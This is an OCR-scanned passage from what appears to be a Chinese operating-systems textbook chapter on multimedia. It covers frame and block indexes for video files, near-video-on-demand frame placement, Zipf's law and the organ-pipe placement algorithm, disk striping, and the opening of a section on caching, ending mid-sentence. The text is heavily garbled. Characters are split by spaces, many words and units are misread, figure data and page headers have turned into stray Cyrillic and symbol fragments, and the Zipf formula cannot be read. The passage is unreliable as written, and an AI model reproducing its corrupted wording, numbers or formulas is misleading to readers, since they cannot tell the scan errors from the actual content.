作为 对 比 ， 图 7-20a 中 小 块 的 使 用 也 会 浪费 某 些 磁盘 空间 ， 因 为 在 每 一 帧 的 最 后 一 块 可 能 有 一 小 部 
分 未 被 使 用 。 对 于 1KB 的 磁盘 块 和 一 部 由 216 000 帧 组 成 的 2 小 时 的 NTSC 电 影 ， 浪 费 的 磁盘 空间 总 共 只 
有 3.6GB 中 的 大 约 108KB。 图 7-20b 浪 费 的 磁盘 空间 计算 起 来 非常 困难 ， 但 是 肯定 多 很 多 ， 因 为 在 一 个 磁 
盘 块 的 尽头 有 时 会 留 下 100KB 的 空间 ， 而 下 一 帧 是 一 个 比 它 大 的 四。 

另 一 方面 ， 块 索引 比 帧 索引 要 小 很 多 。 对 于 256KB 的 块 ， 如 果 帧 的 平均 大 小 为 16KB， 那 么 一 个 块 
大 约 可 以 装 下 16 个 帧 ， 所 以 一 部 由 216 000 帧 组 成 的 电影 在 块 索引 中 只 需要 有 13 500 个 素 引 项 ， 与 此 相对 
比 ， 对 于 帧 索引 则 需要 216 000 个 索引 项 。 因 为 性 能 的 原因 ， 在 这 两 种 情形 中 索引 都 应 该 列 出 所 有 的 帧 
或 磁盘 块 (也 就 是 说 不 像 UNIX 那 样 有 间接 块 )， 所 以 块 索引 在 内 存 中 占用 了 13 500 个 8 字 节 的 项 (4 个 字 
节 用 于 磁盘 地 址 ，1 个 字 节 用 于 帧 的 大 小 ，3 个 字 节 用 于 起 始 帧 的 帧 号 ) ， 帧 索引 则 在 内 存 中 占用 了 216 
000 个 5 字 节 的 项 (只 有 磁盘 地 址 和 帧 的 大 小 ) ， 比 较 起 来 ， 当 电影 在 播放 时 ， 块 索引 比 帧 索引 节省 了 接 
近 1MB 的 RAM 空 间 。 

这 些 考虑 导出 了 如 下 的 权衡 : 

1) 帧 索引 ， 电影 在 播放 时 使 用 大 量 的 RAM， 磁 盘 浪费 小 。 

2) 块 索引 (禁止 分 裂 帧 跨越 磁盘 块 )，RAM 用 量 低 ， 磁 盘 浪费 较 大 。 

3) 块 索 引 (允许 分 裂 帧 跨越 磁盘 块 )，RAM 用 量 低 ， 无 磁盘 浪费 ， 需 要 额外 寻 道 。 

因此 ， 这 里 的 权衡 涉及 回放 时 RAM 的 使 用 量 、 自始至终 浪费 的 磁盘 空间 以 及 由 于 额外 寻 道 造成 的 
回放 时 的 性 能 损失 。 但 是 ， 这 些 问题 可 以 用 各 种 方法 来 解决 。 采用 分 页 操作 在 需要 的 时 候 及 时 将 帧 索引 
装 入 内存， 可 以 减少 RAM 的 使 用 量 。 通 过 足够 的 缓冲 可 以 屏 项 在 帧 传输 过 程 中 的 寻 道 ， 但 是 这 需要 额 
外 的 内 存 并 且 可 能 还 需要 额外 的 复制 操作 。 好 的 设计 必须 仔细 分 析 所 有 这 些 因素 ， 并 且 为 即将 投入 的 应 
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用 做 出 良好 的 选择 。 

这 里 的 另 一 个 因素 是 图 7-20a 中 的 磁盘 存储 管理 更 加 复杂 ， 因 为 存放 一 帧 需要 找到 大 小 合适 的 一 连 串 
连续 的 磁盘 块 。 理 想 情况 下 ， 这 一 连 串 磁盘 块 不 应 该 跨越 一 个 磁道 的 边界 ， 但 是 通过 磁头 偏 斜 ， 这 一 损 
失 并 不 严重 。 然 而 ， 跨 越 一 个 柱 面 的 边界 则 应 该 避免 。 这 些 要 求 意味 着 ， 磁 盘 的 自由 存储 空间 必须 组 织 
成 变 长 孔洞 的 列表 ， 而 不 是 简单 的 块 列表 或 者 位 图 。 与 此 相对 照 ， 块 列表 或 者 位 图 都 可 以 用 在 图 7-20b 中 。 

在 上 述 所 有 情况 下 ， 还 要 说 明 的 是 ， 只 要 可 能 应 该 把 一 部 电影 的 所 有 块 或 者 帧 放置 在 一 个 狭 窗 的 范 
围 之 内 ， 比 如 说 几 个 柱 面 。 这 样 的 存放 方式 意味 着 寻 道 可 以 更 快 ， 从 而 留 下 更 多 的 时 间 用 于 其 他 GEX 
时 ) 活动 ， 或 者 可 以 支持 更 多 的 视频 流 。 这 种 受 约束 的 存放 可 以 通过 将 磁盘 划分 成 柱 面 组 来 实现 ， 每 个 
组 保持 单独 的 空闲 块 列表 或 位 图 。 如 果 使 用 孔洞 ， 可 能 存在 一 个 IKB 和 孔洞 的 列表 、 一 个 2KB 孔 洞 的 列表 
一 个 3KB 到 4KB 孔 洞 的 列表 、 一 个 5SKB 到 8KB 和 孔洞 的 列表 等 。 以 这 种 方法 在 一 个 给 定 的 柱 面 组 中 找到 -一 
个 给 定 大 小 的 孔洞 是 十 分 容易 的 。 

这 两 种 方法 之 间 的 另 一 个 区 别 是 缓冲 。 对 于 小 块 方法 ， 每 次 读 操作 正好 读 取 一 帧 。 因 此 ， 采 用 简单 
的 双 缓冲 策略 就 工作 得 相当 好 : 一 个 缓冲 区 用 于 回放 当前 帧 ， 另 一 个 用 于 提取 下 一 帧 。 如 果 使 用 固定 大 小 
的 缓冲 区 ， 则 每 个 缓冲 区 必须 是 够 大 以 装 得 下 最 大 可 能 的 I 帧 。 另 一 方面 ， 如 果 针 对 每 一 帧 从 一 个 池 中 分 
配 不 同 的 缓冲 区 ， 并 且 当 帧 在 被 读 人 之 前 其 大 小 未 知 ， 那 么 对 于 P 帧 和 B 帧 就 可 以 选择 一 个 较 小 的 缓冲 区 。 

使 用 大 磁盘 块 时 ， 因 为 每 一 块 包含 多 个 帧 ， 并 且 在 每 一 块 的 尽头 还 可 能 包含 帧 的 片段 (取决 于 选 定 
前 面 提 到 的 是 哪 种 选择 ) ， 因 而 需要 更 加 复杂 的 策略 。 如 果 显 示 或 传输 帧 时 要 求 它 们 是 连续 的 ， 那 么 它 
们 就 必须 被 复制 ， 但 是 复制 是 一 个 代价 高 品 的 操作 ， 应 该 尽 可 能 避免 。 如 果 连 续 性 是 不 必要 的 ， 那 么 路 
越 块 边界 的 帧 可 以 分 两 次 送出 到 网 络 上 或 者 送出 到 显示 设备 上 

双 缓 冲 也 可 以 用 于 大 磁盘 块 ， 但 是 使 用 两 个 大 磁盘 块 会 浪费 内 存 。 解 决 浪费 内 存 问题 的 一 种 方法 是 
使 用 比 为 网 络 或 显示 器 提供 数据 的 磁盘 块 (每 个 数据 流 ) 稍 大 一 些 的 循环 传输 缓冲 区 。 当 缓冲 区 的 内 容 
低 于 某 个 阅 值 时 ， 从 磁盘 读 和 人 一 个 新 的 大 磁盘 块 ， 将 其 内 容 复制 到 传输 缓冲 区 ， 并 且 将 大 磁盘 块 缓冲 区 
返还 给 通用 地。 循环 缓 串 区 大 小 的 选取 必须 使 得 在 它 达到 阔 值 时 ， 还 有 空间 能 够 容纳 另 一 个 完整 的 磁盘 
块 。 因 为 传输 缓冲 区 可 能 要 环绕 ， 所 以 磁盘 读 操作 不 能 直接 达到 传输 缓冲 区 。 这 里 复制 和 内 存 的 使 用 量 
相互 之 间 存在 着 权衡 。 

在 比较 这 两 种 方法 时 ， 还 有 另 一 个 因素 就 是 磁盘 性 能 。 使 用 大 磁盘 块 时 磁盘 可 以 以 全 速 运转 ， 这 经 
常 是 主要 关心 的 事情 。 作 为 单独 的 单位 读 入 小 的 P 帧 和 B 帧 效率 是 比较 低 的 。 此 外 ， 将 大 磁盘 块 分 解 在 多 
个 驱动 器 上 (下面 将 讨论 ) 是 可 能 的 ， 而 将 单独 的 帧 分 解 在 多 个 驱动 器 上 是 不 可 能 的 。 

图 7-20a 的 小 块 组 织 有 时 称 为 恒定 时 间 长 度 (constant time length) ， 因 为 索引 中 的 每 个 指针 代表 着 
相同 的 播放 时 间 毫 秒 数 。 相 反 ， 图 7-20b 的 组 织 有 时 称 为 恒定 数据 长 度 〔constant data length) ， 因 为 数据 
块 的 大 小 相同 。 

两 种 文件 组 织 间 的 另 一 个 区 别 是 ， 如 果 帧 的 类 型 存储 在 图 7-20a 的 索引 中 ， 那 么 有 可 能 通过 仅仅 显 
示 ! 帧 实现 快 进 。 然 而 ， 根 据 1 帧 出 现在 数据 流 中 的 频 度 ， 人 们 可 能 会 察觉 到 播放 的 速率 大 快 或 太 慢 。 在 
任何 情况 下 ， 以 图 7-20b 的 组 织 ， 这 样 的 快 进 都 是 不 可 能 的 。 实 际 上 连续 地 读 文件 以 选 出 希望 的 帧 需要 
大 量 的 磁盘 IO。 

第 二 种 方法 是 使 用 一 个 特殊 的 文件 给 人 以 10 倍 速度 快 进 的 感觉 ， 而 这 个 特殊 的 文件 是 以 正常 速度 播 
才 的 。 这 个 文件 可 以 用 与 其 他 文件 相同 的 方法 构造 ， 可 以 使 用 由 索引 也 可 以 使 用 块 索引 。 打 开 一 个 文件 
的 时 候 ， 如 果 需 要 ， 系 统 必须 能 够 找到 快 进 文件 。 如 果 用 户 按 下 快 进 按钮 ， 系 统 必须 立即 找到 并 且 打开 
快 进 文件 ， 然 后 跳 到 文件 中 正确 的 地 方 。 系 统 所 知道 的 是 当前 所 在 帧 的 帧 号 ， 但 是 它 所 需要 的 是 能 够 在 
快 进 文件 中 定位 到 相应 的 帧 。 如 果 系统 当前 所 在 的 帧 号 是 4816， 并 且 知道 快 进 文件 是 10 倍 速 ， 那 么 它 必 
须 在 快 进 文件 中 定位 到 第 482 帧 并 且 从 那里 开始 播放 。 

如 果 使 用 了 帧 索引 ， 那 么 定位 一 个 特定 的 帧 是 十 分 容易 的 ， 只 要 检索 帧 索引 即 可 。 如 果 使 用 的 是 块 
索引 ， 那 么 每 个 索引 项 中 需要 有 额外 的 信息 以 识别 哪 一 帆 在 哪 一 块 中 ， 并 且 必 须 对 块 索引 执行 二 分 搜索 。 
快 倒 的 工作 方式 与 快 进 相 类 似 。 


7.7.3 近似 视频 点 播 的 文件 存放 
到 目前 为 止 我 们 已 经 了 解 了 视频 点 播 的 文件 存放 策略 。 对 于 近似 视频 点 播 ， 采 用 不 同 的 文件 存放 策 


# +ЕЖЯЖ RH 285 


略 可 以 获得 更 高 的 效率 。 我 们 还 记得 ， 近 似 视频 点 播 将 同一 部 电影 作为 多 个 交错 的 数据 流 送出 。 即 使 电 

影 是 作为 连续 文件 存放 的 ， 每 个 数据 流 也 需要 进行 寻 道 。Chen 和 Thapar (1997) 设计 了 一 种 文件 存放 策 

略 几 乎 可 以 消除 全 部 这 样 的 寻 道 。 图 7-21 说 明了 这 一 方法 的 应 用 ， 图 7-21 中 的 电影 以 每 秒 30 杆 的 速率 播放 ， 

每 隔 5 分 钟 开始 一 个 新 的 数据 流 (参见 图 7-17)。 根 据 这 些 参数 ，2 小 时 长 的 电影 需要 24 个 当前 数据 流 。 
磁盘 块 从 磁盘 读 出 的 顺序 一 > 


数据 流 数 据 流 і f 数据 流 рй 
24 ; 23 : 15 { Н 


CEEA ү б i t 
磁道 1 [ o [a000 [18000[27000] 36000] 45000]54000 [6300072000181000] ... 0700] 


磁道 2 [ 1 [e001 |твоот [27001 [36001] a5001]52001 [e3001 [720от[втбо1] --- 07001] 


磁道 3 [ 2 [оог [18002/27002] 38002 4500254002]6300272002181002] --- ротою] 


第 27 002 帧 (大 约 为 电影 的 第 15 分 钟 ) 
图 7-21 针对 近似 视频 点 播 的 优化 帧 存放 策略 


在 这 一 存放 策略 中 ， 由 24 个 帧 组 成 的 帧 集合 连 成 一 串 并 且 作为 一 个 记录 写 和 磁盘。 它们 还 可 以 在 一 
个 读 操作 中 被 读 回 。 考 虑 这 样 一 个 瞬间 ， 数 据 流 24 恰 好 开始 ， 它 需要 的 是 第 0 帧 ，5 分 钟 前 开始 的 数据 流 
23 需 要 的 是 第 9000 帧 ， 数 据 流 22 需 要 的 是 第 18 000 帧 , 以 此 类 推 , 直到 数据 流 0， 它 需要 的 是 第 20 700 帧 。 
通过 将 这 些 帧 连续 地 存放 在 一 个 磁道 上 ， 视 频 服务 器 只 用 一 次 寻 道 (到 第 0 帧 ) 就 可 以 以 相反 的 顺序 满 
足 全 部 24 个 数据 流 的 需要 。 当 然 ， 如 果 存在 某 一 原因 要 以 升序 为 数据 流 提供 服务 ， 这 些 帧 也 可 以 以 相反 
的 顺序 存放 在 磁盘 上 。 完 成 对 最 后 一 个 数据 流 的 服务 之 后 ， 磁盘 息 可 以 移 到 磁道 2 准备 再 次 为 这 些 数 据 
流 服 务 。 这 一 方法 不 要 求 整个 文件 是 连续 的 ， 但 是 对 于 若干 个 同时 的 数据 流 仍然 给 予 了 良好 的 性 能 。 

简单 的 缓冲 策略 是 使 用 双 缓冲 。 当 一 个 缓冲 区 正在 向 外 播放 24 个 数据 流 的 时 候 ， 另 一 个 缓冲 区 正在 
预先 加 载 数据 。 当 前 操作 结束 时 ， 两 个 缓冲 区 进行 交换 ， 刚 才 用 于 回放 的 缓冲 区 现在 在 -个 磁盘 操作 中 
加 载 数 据 。 

一 个 有 趣 的 问题 是 构造 多 大 的 缓冲 区 。 显 然 ， 它 必须 能 够 装 下 24 个 帧 。 然 而 ， 由 于 帧 的 长 度 是 变化 
的 ， 选 取 正 确 大 小 的 缓冲 区 并 不 完全 是 无 足 轻重 的 事情 。 使 缓冲 区 大 到 足以 装 下 24 个 I[ 帧 是 不 必要 的 过 
度 行为 ， 但 是 使 缓冲 区 大 小 为 24 个 平均 帧 则 要 冒 风险 。 

幸运 的 是 ， 对 于 任何 一 部 给 定 的 电影 ， 电 影 中 最 大 的 磁道 (在 图 7-21 的 意义 上 说 ) 事先 是 已 知 的 ， 
所 以 可 以 选择 缓冲 区 恰好 为 这 一 大 小 。 然 而 ， 很 有 可 能 发 生 这 样 的 事情 ， 最 大 的 磁道 有 16 个 I 帧 ， 而 第 
二 大 的 磁道 只 有 9 个 1 帧 。 选 择 缓冲 区 的 大 小 能 够 足以 装 下 第 二 大 的 磁道 可 能 更 为 明智 。 做 出 这 样 的 选择 
意味 着 要 截断 最 大 的 磁道 ， 因 此 对 某 些 数据 流 将 含 弃 电影 中 的 一 帧 。 为 避免 低频 干扰 ， 前 一 帧 可 以 再 次 
显示 ， 没 有 人 会 注意 到 这 一 问题 。 

进一步 运用 这 一 方法 ， 如 果 第 三 大 的 磁道 只 有 4 个 I 帧 ， 使 用 能 够 保存 4 个 I 帧 和 20 个 P 帧 的 缓冲 区 是 
值得 的 。 对 某 些 数据 流 在 电影 中 两 次 引入 两 个 重复 的 帧 可 能 是 可 以 接受 的 。 这 样 做 下 去 何 处 是 头 呢 ? 也 
许 是 缓冲 区 大 小 对 于 99% 的 帧 而 言 足够 大 就 行 了 。 显 然 ， 在 缓冲 区 使 用 的 内 存 和 电影 的 质量 之 间 存 在 着 
权衡 。 注 意 ， 同 时 存在 的 数据 流 越 多 ， 统 计数 据 就 越 好 并 且 帧 集合 也 越 均匀 。 


ТТА 在 单个 磁盘 上 存放 多 个 文件 
到 目前 为 止 我 们 还 只 考虑 了 单 部 电影 的 存放 。 在 视频 服务 器 上， 当然 存 在 着 许多 电影 。 如 果 它 们 随机 
地 散布 在 磁盘 上 ， 那 么 当 多 部 电影 被 不 同 的 客户 同时 观看 时 ， 时 间 将 浪费 在 磁头 在 电影 之 间 来 回 移动 上 。 
通过 观察 到 某 些 电影 比 其 他 电影 更 为 流行 并 且 在 磁盘 上 存放 电影 时 将 流行 性 考虑 进去 ， 可 以 改进 这 
-情况 。 尽 管 总 的 来 说 有 关 个 别 电影 的 流行 性 并 没有 多 少 可 说 的 (除了 有 大 腕 明星 似乎 有 所 帮助 以 外 )， 
但 是 大 体 上 关于 电影 的 相对 流行 性 总 还 是 可 以 说 出 一 些 规律 。 
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对 于 许多 种 类 的 流行 性 比赛 ， 诸 如 出 租 的 电影 、 从 图 书馆 借 出 的 图 书 、 访 问 的 Web 网 页 ， 其 至 一 部 
小 说 中 使 用 的 英文 单词 或 者 特大 城市 居住 的 人 口 ， 相 对 流行 性 的 一 个 合理 的 近似 遵循 着 一 种 令 人 惊奇 的 
可 预测 模式 。 这 一 模式 是 哈佛 大 学 的 一 位 语言 学 教授 George Zipf (1902—1950) 发 现 的 ， 现 在 被 称 为 
Zipf 定 律 。 该 定律 说 的 是 ， 如 果 电 影 、 图 书 、Web 网 页 或 者 单词 按 其 流行 性 进行 排名 ， 那 么 下 一 个 客户 
选择 排行 榜 中 排名 为 的 项 的 概率 是 CL， 其 中 C 是 一 个 归 一 化 常数 。 

因而 ， 前 三 部 电影 的 命中 率 分 别 是 C/1、C/2 和 C/3， 其 中 C 的 计算 要 使 全 部 项 的 和 为 1!。 换 句 话 说 ， 
如 果 有 N 部 电影 ， 那 么 

CI1I+C12+C13+ Сак СІМ 1 

从 这 一 公式 ，C 可 以 被 计算 出 来 。 对 于 具有 10 个 、100 个 、1000 个 和 10 000 个 项 的 总 体 ，C 的 值 分 别 是 
0.341、0.193、0.134 和 0.102。 例 如 ， 对 于 1000 部 电影 ， 前 5 部 电影 的 概率 分 别 是 0.134、0.067、0.045、 
0.034 和 0.027。 

图 7-22 说 明了 Zipf 定 律 。 只 是 为 了 娱乐 ， 该 定律 被 应 用 于 美国 20 座 最 大 城市 的 人 口 。Zipf 定 律 预测 
第 二 大 城市 应 该 具有 最 大 城市 一 半 的 人 口 ， 第 三 大 城市 应 该 具有 最 大 城市 三 分 之 一 的 人 口 ， 以 此 类 推 。 
虽然 不 尽 完美 ， 该 定律 令 人 惊奇 地 吻合 。 


озоо 


频率 


排名 


图 7-22 当 N= 20 时 的 Zipf 定 律 曲线 。 方 块 表示 美国 20 座 最 大 城市 的 人 口 ， 
按 排名 顺序 排列 (纽约 第 一 、 洛 杉 矶 第 二 、 芝 加 哥 第 三 等 ) 


对 于 视频 服务 器 上 的 电影 而 言 ,Zipf 定 律 表明 最 流行 的 电影 被 选择 的 次 数 是 第 二 流行 的 电影 的 两 倍 ， 
是 第 三 流行 的 电影 的 三 倍 ， 以 此 类 推 。 尽 管 分 布 在 开始 时 下 降 得 相当 快 ， 但 是 它 有 着 一 个 长 长 的 尾部 。 
例如 ， 排 名 50 的 电影 拥有 C/50 的 流行 性 ， 排 名 51 的 电影 拥有 C/51 的 流行 性 ， 所 以 排名 51 的 电影 的 流行 性 
是 排名 50 的 电影 的 50/51， 只 有 大 约 2% 的 差额 。 随 着 尾部 进一步 延伸 ， 相 邻 电影 间 的 百分比 差额 变 得 越 
来 越 小 。 一 个 结论 就 是 ， 服 务 器 需要 大 量 的 电影 ， 因 为 对 于 前 10 名 以 外 的 电影 存在 着 潜在 的 需求 。 

了 解 不 同 电影 的 相对 流行 性 ， 使 得 对 视频 服务 器 的 性 能 进行 建 模 以 及 将 该 信息 应 用 于 存放 文件 成 为 
可 能 。 研 究 已 经 表明 ， 最 佳 的 策略 令 人 惊奇 地 简单 并 且 独 立 于 分 布 。 这 一 策略 称 为 管 风 符 算法 (organ- 
рїре algorithm) (Grossman 和 Silverman, 1973; Wong, 1983), 该 算法 将 最 流行 的 电影 存放 在 磁盘 的 中 央 ， 
第 二 和 第 三 流行 的 电影 存放 在 最 流行 的 电影 的 两 边 ， 在 这 几 部 电影 的 外 边 是 排名 第 四 和 第 五 的 电影 ， 以 
此 类 推 ， 如 图 7-23 所 示 。 如 果 每 一 部 电影 是 如 图 7-19 所 示 类 型 的 连续 文件 ， 这 样 的 存放 方式 工作 得 最 
好 ， 如 果 每 一 部 电影 被 约束 在 一 个 狭窄 的 柱 面 范围 之 内 ， 这 样 的 存放 方式 也 可 以 扩大 其 使 用 的 范围 。 该 
算法 的 名 字 来 自 这 样 的 事实 一 一 概率 直方 图 看 起 来 像 是 一 个 稍稍 不 对 称 的 管风琴 。 

该 算法 所 做 的 是 试图 将 磁头 保持 在 磁盘 的 中 央 。 当 服务 器 上 的 电影 有 1000 部 时 ， 根 据 Zipf 定 律 分 布 ， 
排 在 前 5 名 的 电影 代表 了 0.307 的 总 概率 ， 这 意味 着 大 约 30% 的 时 间 磁 头 停留 在 为 排 在 前 5 名 的 电影 分 配 的 
柱 面 中 ， 如 果 有 1000 部 电影 可 用 ， 这 是 一 个 惊人 的 数量 。 


多 柑 体 操作 夭 统 287 


使 用 频率 一 一 


„010 йа 


口 
[% 
П 


图 7-23 视频 服务 器 上 文件 的 管风琴 分 布 


7.7.5 在 多 个 磁盘 上 存放 文件 

为 了 获得 更 高 的 性 能 ， 视 频 服务 器 经 常 拥 有 可 以 并 行 运转 的 很 多 磁盘 。RAID 有 时 会 被 用 到 ， 但 是 
通常 并 不 是 因为 RAID 以 性 能 为 代价 提供 了 更 高 的 可 靠 性 。 视 频 服务 器 通常 希望 高 的 性 能 而 对 于 校正 传 
输 错误 不 怎么 太 关 心 。 除 此 之 外 ， 如 果 RAID 控 制 器 有 太 多 的 磁盘 要 同时 处 理 ， 那 么 RAID 控 制 器 可 能 会 
成 为 一 个 瓶颈 。 

更 为 普通 的 配置 只 是 数目 很 多 的 磁盘 ， 有 时 被 称 为 磁盘 国 (disk farm)。 这 些 磁盘 不 像 RAID 那 样 以 同 
步 方 式 旋转 ， 也 不 像 RAID 那 样 包含 奇偶 校 验 位 。 一 种 可 能 的 配置 是 将 电影 A 存 放 在 磁盘 1 上 ， 将 电影 B 存 
放 在 磁盘 ?上 ， 以 此 类 推 ， 如 图 7-24a 所 示 。 实 际 上 ， 使 用 新 式 的 磁盘 ， 每 个 磁盘 上 可 以 存放 若干 部 电影 。 
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图 7-24 在 多 个 磁盘 上 组 织 多 媒体 文件 的 四 种 方式 : a) 无 条 带 ，b) 所 有 文件 
采用 相同 的 条 带 模式 ，c) 交错 条 带 ，d) 随机 条 带 


这 一 组 织 方式 实现 起 来 很 简单 ， 并 且 具 有 简单 明了 的 故障 特性 : 如 果 一 块 磁盘 发 生 故 障 ， 其 上 的 所 
有 电影 都 将 不 再 可 用 。 注 意 ， 一 家 公司 损失 了 一 块 装 满 了 电影 的 磁盘 并 没有 一 家 公司 损失 了 一 块 装 满 了 
数据 的 磁盘 那么 精 糕 ， 因 为 电影 还 可 以 从 DVD 重新 装载 到 一 块 空闲 的 磁盘 中 。 这 一 方法 的 缺点 是 负载 可 
能 没有 很 好 地 平衡 ， 如 果 某 些 磁盘 上 装载 的 是 目前 十 分 热门 的 电影 ， 而 另外 的 磁盘 上 装载 的 是 不 太 流行 
的 电影 ， 则 系统 就 没有 被 充分 利用 。 当 然 ， 一 旦 知道 了 电影 的 使 用 频率 ， 那 么 手工 移动 某 些 电影 以 平衡 
负载 也 是 可 能 的 。 

第 二 种 可 能 的 组 织 方式 是 将 每 一 部 电影 在 多 块 磁盘 上 分 成 条 带 ， 图 7-24b 所 示 为 4 部 电影 的 例子 。 让 
我 们 暂时 假设 所 有 的 帧 大 小 相同 〈 也 就 是 未 压缩 )。 固 定 的 字 节 数 从 电影 A 写 和 人 磁盘 1， 然 后 相同 的 字 节 
数 写 人 磁盘 2， 直 到 到 达 最 后 一 块 磁盘 〈 在 本 例 的 情形 中 是 A3 单 元 ) 。 然 后 ， 再 次 在 第 一 块 磁盘 处 继续 分 
条 带 操作 ， 写 人 A4 单 元 ， 这 样 进行 下 去 直到 整个 文件 被 写 完 。 电 影 B、C 和 D 以 同样 的 模式 分 成 条 带 。 


288 #7% 


由 于 所 有 的 电影 在 第 一 块 磁盘 开始 ， 这 一 条 带 模式 的 一 个 可 能 的 缺点 是 跨 磁盘 的 负载 可 能 不 平衡 。 
一 种 更 好 地 分 散 负载 的 方法 是 交错 起 始 磁盘 ， 如 图 7-24c 所 示 。 还 有 一 种 试图 平衡 负载 的 方法 是 对 每 一 
文件 使 用 随机 的 条 带 模 式 ， 如 图 7-24d 所 示 。 

到 目前 为 止 ， 我们 一 直 假 设 所 有 的 帧 大 小 相同 ， 而 对 于 MPEG-2 电 影 ， 这 一 假设 是 错误 的 I 帧 比 P 
帧 要 大 得 多 。 有 两 种 方法 可 以 处 理 这 一 新 出 现 的 问题 ， 按 帧 分 条 带 或 按 块 分 条 带 。 按 帧 分 条 带 时 ， 电 影 
A 的 第 一 帧 作为 连续 的 单位 存放 在 磁盘 1 上 ， 不 管 它 有 多 大 。 下 一 帧 存放 在 磁盘 2 上 ， 以 此 类 推 。 电 影 B 
以 类 似 的 方式 分 条 带 ， 或 者 在 同一 块 磁盘 上 开始 ， 或 者 在 下 一 块 磁盘 上 开始 (如果 是 交错 条 带 ) ， 或 者 
是 在 随机 的 一 块 磁盘 上 开始 。 因 为 每 次 读 人 一 帧 ， 这 一 条 带 形式 并 没有 加 快 任何 给 定 电影 的 读 人 ， 然 而 
它 比 图 7-24a 更 好 地 在 磁盘 间 分 散 了 负载 ， 如 果 有 许多 人 决定 今 晚 现 看 电影 A 而 没有 人 想 看 电影 C， 图 
7-24a 的 表现 将 很 精 糕 。 总 的 来 说 ， 在 所 有 的 磁盘 间 分 散 负载 将 更 好 地 利用 总 的 磁盘 带宽 ， 并 因此 而 
增加 能 够 服务 的 顾客 数目 。 

分 条 带 的 另 一 种 方法 是 按 块 分 条 带 。 对 于 每 部 电影 ， 固 定 大 小 的 单元 连续 (或 随机 ) 写 到 每 块 磁盘 
上 。 每 个 块 包含 一 个 或 多 个 帧 或 者 其 中 的 碎片 。 对 于 同一 部 电影 ， 系 统 现在 可 以 发 出 对 多 个 块 的 请 求 ， 
每 个 请 求 要 求 读数 据 到 不 同 的 内 存 缓冲 区 ， 但 是 以 这 样 的 方式 ， 当 所 有 的 请 求 都 完成 时 ， 一 个 连续 的 电 
影片 断 〈 包 含 多 个 帧 ) 在 内 存 中 将 被 连续 地 组 装 好 。 这 些 请 求 可 以 并 行 处 理 。 当 最 后 一 个 请 求 被 满足 时 ， 
可 以 用 信号 通知 请 求 进程 工作 已 经 完成 了 ， 此 时 它 就 可 以 将 数据 传送 给 用 户 。 许 多 帧 过 后 ， 当 缓冲 区 下 
降 到 最 后 几 帧 时 ， 更 多 的 请 求 将 被 发 出 ， 以 便 预 装载 另外 一 个 缓冲 区 。 这 一 方法 使 用 了 大 量 的 内 存 作为 
缓冲 区 ， 从 而 使 磁盘 保持 忙碌 。 在 一 个 具有 1000 个 活跃 用 户 和 1MB 缓 冲 区 的 系统 上 (例如 ， 在 4 块 磁盘 
中 的 每 块 上 使 用 256KB 的 磁盘 块 )， 将 需要 1GB 的 RAM 作 为 缓冲 区 。 在 1000 个 用 户 的 服务 器 上 ， 这 样 的 
内 存 用 量 只 是 “小 意思 ”， 应 该 不 会 有 问题 。 

关于 条 带 的 最 后 一 个 问题 是 在 多 少 个 磁盘 上 分 条 带 。 在 一 个 极端 ， 每 部 电影 将 在 所 有 的 磁盘 上 分 成 
条 带 。 例 如 ， 对 于 2GB 的 电影 和 1000 块 磁盘 ， 可 以 将 2MB 的 磁盘 块 写 在 每 块 磁盘 上 ， 这 样 就 没有 电影 两 
次 使 用 同一 块 磁盘 。 在 另 一 个 极端 ， 磁盘 被 分 区 为 小 的 组 (如 同 图 7-24 那 样 )， 并 且 每 部 电影 被 限制 在 
一 个 分 区 中 。 前 者 称 为 宽 条 带 (wide striping)， 它 在 平衡 磁盘 间 负 载 方面 工作 良好 。 它 的 主要 问题 是 每 
部 电影 使 用 了 所 有 磁盘 ， 如 果 一 块 磁盘 出 现 故障 ， 那 么 就 没有 电影 可 以 观看 了 。 后 者 称 为 窜 条 带 
(narrow striping)， 它 将 遭遇 热点 〈 广 受 欢 迎 的 分 区 ) 的 问题 ， 但 是 损失 一 块 磁盘 将 只 是 葬送 存放 在 其 
分 区 中 的 电影 。 对 于 可 变 大 小 帧 的 划分 条 带 ，Shenoy 和 Vin (1999) 在 数学 上 进行 了 详细 的 分 析 。 


7.8 高 速 缓存 

传统 的 LRU 文 件 高 速 缓存 对 于 多 媒体 文件 而 言 工作 得 并 不 好 ， 这 是 因为 电影 的 访问 模式 与 文本 文件 
有 所 不 同 。 在 传统 的 LRU 缓 冲 区 高 速 缓存 背后 的 思想 是 ， 当 一 个 块 被 使 用 之 后 ， 应 该 将 其 保存 在 高 速 组 
存 中 ， 以 防 很 快 再 次 需要 访问 它 。 例 如 ， 在 编辑 一 个 文件 的 时 候 ， 文 件 被 写 人 的 一 组 磁盘 块 很 可 能 反复 
地 被 用 到 ， 直 到 编辑 过 程 结束 。 换 言 之 ， 如 果 一 个 磁盘 块 在 短暂 的 时 间 间 隔 内 存在 比较 高 的 可 能 性 要 被 
重用 的 话 ， 它 就 值得 保存 在 高 速 缓存 之 中 ， 以 免 将 来 对 磁盘 的 访问 。 

对 于 多 媒体 而 言 ， 通 常 的 访问 模式 是 按 硕 序 从 头 到 尾 观看 一 部 电影 。 一 个 块 不 太 可 能 被 使 用 两 次 ， 
除非 用 户 对 电影 进行 倒 带 操作 以 再 次 观看 某 一 场景 。 因此， 通常 的 高 速 缓存 技术 是 行 不 通 的 。 然 而 ， 高 
速 缓存 仍然 是 可 以 有 帮助 的 ， 只 不 过 是 要 以 不 同 的 方式 使 用 。 在 下 面 几 小 节 ， 我 们 来 看 一 看 适用 于 多 媒 
体 的 高 速 缓存 技术 。 

781 块 高 速 缓存 

尽管 只 是 将 一 个 块 保存 起 来 期 望 它 可 能 很 快 再 次 被 用 到 是 没有 意义 的 ， 但 是 可 以 利用 多 媒体 系统 的 
可 预测 性 ， 使 高 速 缓存 再 度 成 为 十 分 有 益 的 技术 。 假 设 两 个 用 户 正在 观看 同一 部 电影 ， 其 中 一 个 用 户 在 
另 一 个 用 户 2 秒 钟 之 后 开始 观看 。 当 第 一 个 用 户 取出 并 观看 了 任何 一 个 给 定 的 块 之 后 ， 很 有 可 能 第 二 个 
用 户 在 2 秒 钟 后 将 需要 相同 的 块 。 系 统 很 容易 跟踪 哪些 电影 只 有 一 个 观众 ， 哪 些 电 影 有 两 个 或 更 多 个 在 
时 间 上 相隔 很 近 的 观众 。 

因此 ， 只 要 一 部 电影 中 的 一 个 块 读 出 后 很 快 会 再 次 需要 ， 对 其 进行 高 速 缓存 就 是 有 意义 的 ， 当 然 是 
